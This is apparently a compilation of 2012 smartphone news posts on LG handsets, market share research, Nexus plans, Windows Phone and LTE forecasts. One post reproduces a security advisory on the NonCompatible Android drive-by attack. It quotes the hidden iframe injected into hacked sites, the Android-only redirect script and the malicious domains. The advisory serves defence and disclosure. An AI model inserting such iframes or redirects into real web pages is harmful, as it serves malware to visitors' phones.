Latest research shows Apple holds 7.9% of the total global mobile phone market, sitting in third place behind Samsung and Nokia.

Samsung may be reaping the rewards from its multiple Galaxy product ranges, but Apple is showing that the world can be dominated with just a few products. Latest research from Gartner shows that Apple has gained 7.9% market share of the entire global phone sales market, despite only have three iPhones on sale. The research firmly pegs Apple in third place behind Nokia and Samsung.

Total sales of mobile phones are down on last year, but smartphones continue to rise as more people choose smartphones over featurephones. Gartner also warns that whilst Apple’s iOS (and Windows Phone) offer different experiences, devices running on the Android platform would struggle to differentiate going forward with the main differential being price, especially in the mid-range.

“This is particularly true for smartphones based on the Android OS, where a strong commoditization trend is at work and most players are finding it hard to break the mould.”

Traditionally Google has only launched one Nexus branded handset per year, following the lead of Apple, but that could be set to change according to the Wall Street Journal. WSJ report that Google is planning a much bigger roll out of Nexus branded handsets this year with up to 5 manufacturers, including Motorola who are being purchased by Google, all launching Nexus branded stock Android smartphones.

Why is Google planning this? To ease growing unrest over the company’s planned acquisition of Motorola which Google partners believe could give the company unfair favouritism. Google is also hoping that the launch of a range of Nexus branded stock Android devices would mean that the hardware OEMs differentiate against each other based purely on hardware, and not the current hardware/UI differentiation status quo.

Google is also hoping that offering multiple manufacturers early access to the latest Android build will represent faster updates for non-Nexus devices and the WSJ also comments that Google could look to enforce the pure Android platform on all Android devices as the use of custom UIs often leads to slower updates and a poorer experience.

Google’s plan of attack isn’t exclusive to mobile smartphones either as the company could use the same concept to relaunch Android tablets. The new Nexus branded handsets would be sold directly through Google’s online store, network-free, unlocked and at a full price.

LG has announced that their quad-core LG Optimus 4X HD smartphone will be available in Europe in June 2012, starting off with Germany, Sweden, Great Britain, Poland and Italy.

LG announced the device back at Mobile World Congress 2012, and shortly after Clove started taking pre-orders for the device. Featuring a 4.7inch True HD IPS display (1280 x 720 pixels), the Optimus 4X HD is powered by the same 1.5 GHz quad-core Tegra 3 processor as featured in the HTC One X.

The Optimus 4X HD runs on Android 4.0 Ice Cream Sandwich and also has an 8 megapixel autofocus camera with LED flash, 1.3MP secondary camera, alongside 16GB internal memory, 1GB RAM and an array of connectivity options.

An unannounced high-end superphone from LG has been revealed, featuring a mouth watering specs list that could firmly put the company back on the map. The LG LS970 Eclipse should go head to head with the HTC One X and Samsung Galaxy S III, which both feature HD displays and quad-core processors.

LG’s upcoming flagship smartphone has been revealed with the codename LG Eclipse and looks set to feature a 4.67inch 720p HD display, quad-core 1.5GHz Snapdragon CPU, 13 megapixel camera and 2GB RAM, one of the highest amounts of RAM ever to feature on a smartphone.

Other notable features of the upcoming device include 16GB internal storage, a 2,100 mAh battery and a case that is just 8.6 millimeters thick. The CPU is confirmed as a 1.5 GHz Qualcomm quad-core Krait processor, part of the Snapdragon S4 series, and is accompanied by an Adreno 320 GPU. The CPU is the best CPU to be announced to date and LG’s latest flagship looks set to be the first smartphone to make use of it.

The LG LS970 Eclipse is set for release in the USA in Q4 2012, and will feature LTE support for US carrier Sprint. It’s unknown whether this device will make it to the UK or not but with the S4 processor and 2GB RAM, we’re anxious to see this go head to head with the HTC One X and Samsung Galaxy S III.

Latest research from market research firm Nielsen has shown that more than half (50.4%) of US mobile subscribers now own a smartphone, following an increase from December 2011 (47.8%).

Smartphone penetration continued to dominate the key US market, with Apple being called the top manufacturer whilst Android was touted as the top platform. Nokia’s Lumia 900, released in the US last month, has continued to do well and capture consumers’ imagination, whilst the Windows Phone platform only captured 1.7% market share in Q1 2012 (even Windows Mobile, the older version of the platform, had a higher market share at 4.1%).

During Q1 2012, 48% of smartphones ran Android, whilst iOS captured 32% market share and RIM’s fledgling BlackBerry platform came in at a healthy 11.6% market share.

The LG Optimus L7 features a 4.3 inch display and runs on a angle-core 1GHz processor. The smartphone comes equipped with Android 4.0 Ice Cream Sandwich.

The L7 will be available on pay as you go from Phones4U. Phones4U is has the L7 in white on offer. They have been doing very well as a network, often taking in the exclusive orders for white variants of smartphones. The price SIM-free is £329 but on pay as you go attached to one of the networks, the cost comes down to £299.

The L7 is a great device and fits well into the market. It uses a single core 1GHz processor which is quite some distance from the quad-core 1.4GHz that ships in Samsung’s new Galaxy S3.

The Samsung Galaxy S3 was announced a few days ago. The L7 carries with it a 5 megapixel camera and at 8.7mm is it thinner than the Galaxy S3.

The Android phone is under attack by a new form of hacking attempt. Please read the full information below and be wary of installing any unofficial products or apps.

Security Alert: Hacked Websites Serve Suspicious Android Apps (NonCompatible)

Hacked websites are frequently used to infect PCs with malware; however, today we have identified the first time hacked websites are being used to specifically target mobile devices. Lookout is in the process of rolling out an update to protect against the new threat, NonCompatible.

How it Works

In this specific attack (called NonCompatible), if a user visits a compromised website from an Android device, their web browser will automatically begin downloading an application—this process is commonly referred to as a drive by download.

When the suspicious application finishes downloading, the device will display a notification prompting the user to click on the notification to install the downloaded app. In order to actually install the app to your phone, you must have the “Unknown sources” setting enabled (this feature is commonly referred to as “sideloading”). If the device does not have the unknown sources setting enabled, they will not be affected by the application; however, if a user does have the unknown sources setting enabled, installing the app will result in their device becoming infected.

Technical details

Infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>

We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.

When a PC-based web browser accesses the site at gaoanalitics.info, a not found error is returned; however, if a web browser with the word “Android” in its user-agent header accesses the page, the following is returned:

<html><head></head><body><script type=”text/javascript”>window.top.location.href = “hxxp://androidonlinefix.info/fix1.php”;</script></body></html>

This page causes the browser to immediately attempt to access the page at androidonlinefix.info. Like the previous site, only browsers sending an Android User-agent string will trigger a download (all other browsers will show a blank page). When visiting this page from an Android browser, the server returns an android application, causing an Android browser to automatically download it.

Technical Summary

Suspicious applications are currently served from the following sites:

· gaoanalitics.info

· androidonlinefix.info

Command and Control (C&C) domains include:

· notcompatibleapp.eu

We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous. As Lookout identifies the extent of infected websites, we will update this blog post.

The Lookout security team is actively investigating the infected websites and suspicious application.

LG has confirmed that the company has not given up on the Windows Phone platform, but is backing Android for the moment to meet consumer demand.

We reported yesterday that LG was dropping Microsoft’s platform and here’s what LG had to say about the original article which appeared in the Korea Herald.

“None of it is true. Korea Herald is showing its speculative side again,” a spokesman for the company in Korea exclusively told Pocket-lint before adding, “We are still on board with Windows Phone, but right now, we’re focusing on Android because that’s where the demand is.”

So that’s that then and LG has sought clarify its Windows Phone position.

Earlier today, LG Electronics announced that the company had no plans to introduce Windows Phone devices, instead focusing on their Android offering. Whilst announcing the decision, LG said: “The total unit of Windows Phone sold in the global market is not a meaningful figure,” which indicates the job that Microsoft have to ensure Windows Phone gains traction.

LG was one of the launch partners for Microsoft’s OS, and since the launch of the platform in 2009, the Windows Phone strategy hasn’t paid dividend for the Korean company. LG endured a seven quarter streak for making a loss, whilst also losing market share to rival Android devices.

LG have agreed to “continue research and development efforts” on Windows Phone and the loss of LG, a major OEM for the Windows Phone platform, leaves Nokia, HTC and Samsung as the three main OEMs for the platform.

LG has announced LG Cloud, which offers multimedia streaming between smartphones, tablets, smart TVs and PCs. The service brings 2D and 3D content, converted through server-based media compression to match your device.

“Most companies today only see the cloud as a storage device or in the case of YouTube or Flickr, only for one type of content,” new LG Cloud chief Havis Kwon said.

“LG makes the devices that millions of people watch content on so we can set a new yardstick for ease of use by setting up our own cloud service. Tomorrow’s consumers don’t want to go to one cloud for music, another cloud for video, another location for photos and yet another cloud for their office files. In the end, our solution is about making life more convenient.”

The service allows the user to upload videos from a PC to the cloud as well as photos and other multimedia content to the cloud with it being available remotely almost instantaneously remote on other devices.

The LG Viper LS840 is the first 4G LTE device to make its way to Sprint.

The LG Viper has pretty big sting to its tale with a 4-inch 700 NIT display, said to be the brightest display available on the smartphone market today. It will need a pretty big battery pack if that is the case to take care of the extra consumption that may be incurred. However, the phone is future proofed and it’s also ‘green’. The smartphone comes encased in 50% recyclable plastic and with an energy-efficient charger with 0.03 no-load power rating.

The LG Viper is an affordable phone suited for the medium priced phone market and arrives with a 5-megapixel camera, 1.2GHz dual-core processor with LTE, NFC and Google Wallet support. The Viper is 100% recyclable.

LG will be selling the device with a years worth of free cloud storage from Box.com, 50GB worth which is with $250 on its own.

The LG is particularly orientated towards parents and families and includes a special app developed for the Viper. The Life’s Good Fairytale app brings storybooks beyond the interactive stage by involving parents and children together in its active story time.

The Viper display is made of Corning Gorilla Glass and will go on sale this Sunday.

Sunday is Earth Day so it is an appropriate time to see the Viper on sale, available for $99.99 with a 24 month contract and a nice bonus of $50 mail-in rebate.

News breaks today that suggests Microsoft could be set to introduce a form of OEM branding and customisation in the upcoming smartphone version of Windows 8. The news comes via Netbook News who today report that Microsoft is preparing a Sit down meeting with Windows Phone partners to discuss the upcoming Windows Phone Apollo platform.

There is very little confirmed news re the meeting except for the agenda which reads:

Apollo Review

Windows Phone Schedules and release plans/processes

Customization & Differentiation opportunities

New Windows Phone 8 application development capabilities

What’s new feature review of Apollo

Connectivity and APN management

Better together with Windows 8

Some website have taken the “Customization & Differentiation opportunities” part of the agenda as confirmation that Microsoft will allow their partners to customise the experience deeply, but I’d expect the Redmond based company to allow their partners some degree of flexible control and differentiation whilst retaining the platform’s Metro UI and look and feel.

It is also possible that Microsoft wants their partners to push the platform over their Android devices; Android remains the only truly customisable platform for OEMs and partners which is why they tend to choose that over Windows Phone. A more customisable and hence differentiated Windows Phone Apollo would appeal to both OEMs and in fact mobile networks who could include their own branding and services and this could be just what Microsoft needs to firmly establish the platform as the choice of manufacturers and partners.

This looks set to become a right royal PR mess but to begin with, according to Microsoft (via The Verge), the current line of Windows Phone smartphones won’t get the official update to Microsoft’s upcoming Windows Phone Apollo update.

However, WMPowerUser quote Microsoft evangelist Nuno Silva as saying the devices will get the update, and they have a video interview to prove it.

Originally, it was thought the Windows Phone update wouldn’t come to existing devices due to hardware limitations, but it seems that that is no longer the case.

No matter what happens, Windows Phone users will be extremely annoyed if they don’t get the update, so Microsoft, if it’s possible, get the update out to users! You really can’t afford people to “jump ship” and move platforms.

Nokia have posted a new advert for the Nokia Lumia 900, with the latest “Beta Test” commercial depicting how all smartphones don’t have to look alike.

The “Beta Test” series kicked off with the first ad which targeted Apple’s iPhone and the latest advert takes the fight to both iPhones and Android devices, which have the unfortunate similarity of looking like their peers and not feeling unique.

Nokia’s first ad may have been risky, but the latest ad focuses on one of the areas where Nokia has always excelled; design (camera quality and usually battery life are some of the others).

Nokia’s design in the Lumia series has most definitely been eye catching and the current ad really does show that off.

The Lumia 900 made its official debut in the US last week and is set to debut in the UK later this month, with pre-orders having begun already.
The US' "Big Four" carriers announce plans to introduce a collective database of stolen phones to prevent their use in the US, similar to the UK's current database.

The big four network carriers in the US, Verizon, AT&T, Sprint and T-Mobile, have today announced plans to introduce a database containing the IMEI (identification) numbers of stolen mobile devices.

One of the biggest problems that affects mobile users worldwide is stolen phones, of which there are growing numbers, and the use of them afterwards. The UK operates a national crime database which disables the use of any handset listed as stolen (or lost even) on any UK network. However, these devices work freely outside the UK.

With the US’s top four carriers catering for around 90% of mobile device usage in the US, the idea of a combined database makes perfect sense and should prohibit the use of those devices on any of the four carriers. The combined database should launch within six months and there are plans to make this into a national database within 18 months, disabling the use of any of those devices on any US network. The plans are being backed by CTIA.

There are four voluntary industry commitments in place in the US, which address the issue of stolen devices:

Implement databases to prevent reactivation of stolen smartphones.

(A) Notify consumers of features to secure/lock smartphones with passwords.
(B) Educate consumers about features to secure/lock smartphones with passwords.

Educate consumers about applications to remotely lock/locate/erase data from smartphones.

Educate consumers about smartphone theft, protections and preventative measures.

The plans are sure to be a great deterrent against mobile phone theft and this could eventually lead to cross-Atlantic (or even global) co-operation to prevent the use of stolen smartphones around the world.

More on this when we get it.

I’m not going to lie, Google’s rebranding of the Android Market to the Google Play Store really does seem pointless but you can see why Google has done it.

Some users have found out that apps, that they hard forked out their hard earned money for in the Android Market, had gone missing when Google rebranded the market. The same users were getting errors when trying to access the app directly.

Rest assured, Google is looking into the matter having added it to their Known Issues pages. We’ve not had the bug ourselves but it’s definitely an issue if it affects you. Hopefully Google will roll out a fix very soon.

Global 4G LTE shipments reached 6.8 million last year, in the next-generation wireless network’s first mainstream year. A study from market research firm Strategy Analytics has revealed that the shipments of 4G-enabled smartphones could grow tenfold in 2012, achieving heights of around 67 million by year-end.

Companies such as Samsung, HTC and LG have so far embraced the technology and the growth in LTE smartphones is expected to increase further when Apple unveils the iPhone 5 later this year, which should follow the company’s New iPad, which features 4G LTE support.

Neil Mawston, Executive Director at Strategy Analytics said:

“The mobile industry is entering a breakout year for 4G LTE technology. Multiple operators and multiple phone vendors will be launching dozens of LTE models across numerous countries worldwide. LTE has quickly become a high-growth, high-value market that no operator, service developer, device vendor or component maker can afford to ignore.”

STRATEGY ANALYTICS: Global LTE Phone Shipments Will Surge Tenfold to 67 Million Units in 2012

Boston, MA – March 23rd, 2012 –- According to the latest research from Strategy Analytics, global LTE phone shipments will grow tenfold to reach 67 million units in 2012. It is a breakout year for 4G technology. Companies leading the growth spurt will include Apple, Samsung, HTC and others.

Neil Shah, Analyst at Strategy Analytics, said, “We forecast global LTE phone shipments to grow tenfold from 6.8 million units in 2011 to 67.0 million in 2012. Major countries driving LTE growth this year will include the United States, Japan and South Korea. Multiple operators, such as Verizon Wireless, NTT Docomo and SK Telecom, are aggressively expanding their LTE networks. Key vendors leading the push into LTE phones will include Apple, Samsung, HTC, LG, Nokia, Motorola, Pantech and Fujitsu.”

Neil Mawston, Executive Director at Strategy Analytics, added, “The mobile industry is entering a breakout year for 4G LTE technology. Multiple operators and multiple phone vendors will be launching dozens of LTE models across numerous countries worldwide. LTE has quickly become a high-growth, high-value market that no operator, service developer, device vendor or component maker can afford to ignore.”

Tom Kang, Director at Strategy Analytics, added, “The LTE phone segment is expanding at a rapid rate this year, but there will undoubtedly be growing pains in this early phase. Many LTE phones and data plans will be relatively expensive, which means operators will need to invest generous subsidies to make 4G more affordable for subscribers. Meanwhile, consumers will be concerned about LTE usability issues, such as shortened battery life, excessive device weight or sudden bill shock caused by high data consumption.”

Apps make a platform, and the availability of apps is what consumers often look at when choosing their next device. Part of today’s smartphone ecosystems are engaging with and keeping developers on board.

Appcelerator and market research firm IDC announced the results of a joint survey of 2,173 global app developers. The report reveals that 89% of developers who responded were interested in developing for the iPhone, whilst 88% said they were interested in Apple’s iPad, which is no surprise given its ever increasing success.

Developers are also losing interest in the Android operating system “due to continued fragmentation of the platform” with interest dropping to 78.6% for Android smartphones and 65.9% for Android tablets.

Windows Phone retains a strong appeal amongst the developer community, being classified as the “number three OS in terms of priorities” whilst interest in the BlackBerry platform continued to decline, dropping 5.2% from Q4 2011 (20.7%) to Q1 2012 (15.5%).

Appcelerator / IDC Mobile Report Reveals Google Strongly Positioned to Battle Facebook in Social Mobile

Survey Shows Google’s Assets as Key Differentiator in Platform War with Facebook; Android Interest Erodes as HTML5 Becomes a Must-Have for Mobile Apps

Mountain View, CA and Framingham, MA (PRWEB) March 20, 2012

Appcelerator®, the leading mobile platform company, and industry leading analyst firm International Data Corporation (IDC), today announced results from a new joint survey of 2,173 Appcelerator developers around the world. Findings reveal developers’ accelerating interest in social mobile capabilities, and – notwithstanding Facebook’s 900 million users – developers view Google and its broad range of assets (i.e., Google+, search, Gmail, Android, Android Market, etc.) as key to implementing their social strategies in 2012. The report also shows that Android – once neck-and-neck with iOS – is seeing waning interest due to continued fragmentation of the platform, and that HTML5 will play a bigger role in the mobile app development space this year.

Appcelerator and IDC also continued to observe a maturation of mobile strategies, as companies move from Exploration towards Acceleration and Innovation in their mobile initiatives. The full report is available free for download at http://bit.ly/q1-2012-report.

The Google & Facebook Battle Moves to Mobile
Developers clearly see the worlds of mobile and social coming together as a huge opportunity, but they are struggling to understand how to leverage social assets in their mobile apps, including Facebook’s social graph. At the same time, they recognize immediate value in having easy integration capabilities represented in Google’s combined network effects with Google search, YouTube, Gmail, Google Maps, etc. In fact, 39% of developers say that the network effects of Google’s broad range of assets are more important to their social strategies in 2012 than Facebook’s social graph.

“This translates into a big competitive opportunity for Google—and potential significant risk for Facebook—especially because developers perceive Google as innovating faster than Facebook,” said Scott Ellison, VP Mobile & Connected Consumer Platforms at IDC. “Add to that, Google itself is clearly gearing up to leverage its network effects, one example being the alteration of its privacy policies to allow sharing of user data across its services.”

For all of the excitement and opportunities that social networking creates within the mobile ecosystem, this survey revealed developers don’t feel they have the knowledge or tools to fully leverage social in their app strategies. There are opportunities for established players like Facebook, LinkedIn, and RenRen, as well as for challengers like Google and even Apple, to engage, educate and provide tools to help contribute to developers’ success, and drive engagement with their platforms.

The Rise of HTML5 & Windows 7, iOS Dominance and Slow Android Erosion
The mobile app space to date has been dominated by native apps. However in 2012, HTML5 will move to center stage with both pure mobile browser apps and “hybrid apps,” which integrate both native code and substantial amounts of HTML5. This approach will help developers innovate across a crowded mobile landscape that has seen iOS, Android, and Windows 7 claim the top 3 spots, while RIM and others have experienced significant declines. While Android has seen enormous growth in shipments and remains a solid #2, fragmentation continues to take its toll.

Below are the top findings from this quarter’s report:

HTML5 becomes important to many mobile developer strategies. A resounding 79% of mobile developers report that they will integrate HTML5 in their apps in 2012. This is much higher than many industry observers had anticipated as late as Q4 2011.
Developers are struggling to understand and leverage Facebook’s social graph. Leveraging the full social graph itself ranked low – tied for 8th out of 11 social priorities for developers, while developers’ top uses of social remain notifications, status updates and authentication.
Google’s network effects of its vast assets are a key strategic differentiator against Facebook. Google’s footprint across its assets (search, advertising, YouTube, Gmail, Android, Maps, etc.) and its resultant network effect is indexing higher than expected, given the size of Facebook’s massive lead in social.
Mobile app development continues to Accelerate in 2012. More than half (53.5%) of respondents report that they are now focused on Accelerating their mobile strategies compared to 27.4% in 2010, and 16.9% of respondents report that they will be focused on Innovating their mobile apps in 2012 compared to 9.2% in 2010.
Windows Phone 7 interest remains high. WP7 is the clear “number three” OS in terms of priorities, after Apple’s iOS and Google’s Android. The huge jump in interest in Q4 2011 is holding steady notwithstanding somewhat disappointing WP7 device sales to date.
This quarter saw another sharp drop in developer interest in BlackBerry OS. Developer interest declined from 20.7% in Q4 2011 to 15.5% in Q1 2012, set against negative news around RIM’s challenges.
iOS continues to reign at number one in developer interest levels. Eighty-nine percent (89%) of respondents say they are very interested in developing for the iPhone, followed by the iPad at 88%.
Android phones and tablets are showing slow erosion of interest levels. This quarter, interest in Android phones dropped 4.7% points to 78.6%, and Android tablets dropped 2.2% points to 65.9% from the previous survey. Although close to or within the margins of error, these drops are consistent with the trend of small but steady erosion in Android interest over the last four quarters, even as enormous growth in Android unit shipments continues.
Location and notifications are the top two cloud services developers plan to use to help scale. Location and notifications are the top two services that developers plan to integrate into their applications to help scale up their mobile initiatives in 2012.
From Exploration to Acceleration and Innovation
Developers continue to move toward a maturation of their mobile strategies: to Acceleration and Innovation and away from initial app market Exploration. A majority of respondents believe they are clearly in the Acceleration phase now, with the expectation that they will be building multiple applications on a number of different operating systems.

Throughout the survey, messages of a gradually maturing market permeate. Growth in the number of developers building mobile applications, growth in the number of operation systems and applications supported, growth in the size of companies that are building mobile applications as well as increasing numbers of hybrid teams (both internal application development teams combined with external application development teams) are all evidence of this maturity. This quarter’s survey underscores that 2012 will mark key shifts in platform strategies, how social will be leveraged, and how fast these changes will emerge in the marketplace.

The slow release of updates to Android devices of Ice Cream Sandwich has been frustrating for consumers and the networks have been lacking with information on news of its appearance.

Today, Verizon led the pack by publishing a list of smartphones that will be getting the updates. Unfortunately, no timetable has been structured but at least if you are an owner of once of these devices you can rest a little easier knowing your position.

Verizon’s list reads:

HTC: Thunderbolt, Droid Incredible 2, Rhyme, Rezound

Motorola: Xoom, Bionic, RAZR, RAZR Maxx, Droid 4, Xyboard 8.2, Xyboard 10.1

Samsung: Galaxy Tab 10.1, Galaxy Tab 7.7

LG: Spectrum

We will keep you up to date on this information as soon as we are able.

LG’s first foray into the 3D smartphone market wasn’t the most successful; the concept was well thought out but the execution not the best. We can forgive them as it was their first attempt and just before Mobile World Congress 2012, LG debuted the successor to the Optimus 3D, this one being named the LG Optimus 3D Max.

Here, Mani from LG takes us on a quick tour of the 3D Max and what the device has to offer to satisfy the 3D thirst.

LG have confirmed that the Optimus L3, part of LG’s Optimus L style series will launch in Europe before the end of the month.

Targeted at low-end consumer users whilst giving them a sleek device, the L3 features a designer rear cover which adds to the allure of the device. Russia and Asia are next up on the L3′s launch schedule, possibly followed by a global rollout.

The L3 features a low-end 800MHz single-core CPU alongside a lo-res 3.2 QVGA display. You’ll want to get hands on with the device before buying to make sure it’s fitting your needs.

Whilst at Mobile World Congress 2012, we got Mani from LG to give us an overview and demo of key features on the newly announced LG Optimus Vu.

Featuring a 5 inch display 4:3 aspect ratio, the Optimus Vu is LG’s answer to Samsung’s Galaxy Note, yet another device from the niche “phablet” market.

Here’s what Mani had to say…

We spent some time on the LG stand at Mobile World Congress 2012 and one of the highlights was definitely the quad-core monster LG Optimus 4XHD alongside the 2D-3D converter for the device.

Rather than talk you through the device in a gallery of photos, we’ll leave it to Mani from LG to talk through the 4XHD.

LG has unveiled it’s new “Optimus L-Series” devices, following their L teasers posted on their Facebook wall. LG unveiled the Optimus L7, L5 and L3 and promised to show off the devices at next week’s MWC conference in Barcelona.

The three smartphones share a common square, thin metallic design and similar to BlackBerry smartphones of old, they feature a leather-like panel on the back of the device. LG also claim the devices feature a “floating mass display”, a display that sits closer to the surface than its competitor smartphones.

The Optimus L7 features a 4.3 inch display whilst the L5 sports a 4 inch display. Both devices are set to offer Ice Cream Sandwich and should be on our shelves within a few months.

The Optimus L3 represents the company’s low-end offering, featuring a compact 3.2-inch display and Android Gingerbread. The L3 should be released next month in Europe.
